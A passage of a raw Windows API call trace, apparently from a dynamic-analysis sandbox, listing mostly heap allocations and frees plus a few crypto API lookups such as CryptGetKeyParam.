[0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0104.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0104.527] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0648 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0104.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0104.527] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0104.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0104.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0104.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0648 | out: hHeap=0x1780000) returned 1 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0104.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0104.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0104.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0490 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0104.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0104.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0104.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0260 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0104.532] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0104.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d06e8 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0104.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d06e8 | out: hHeap=0x1780000) returned 1 [0104.533] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2b80, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2b80*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0104.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0104.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0490 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0104.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0104.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: 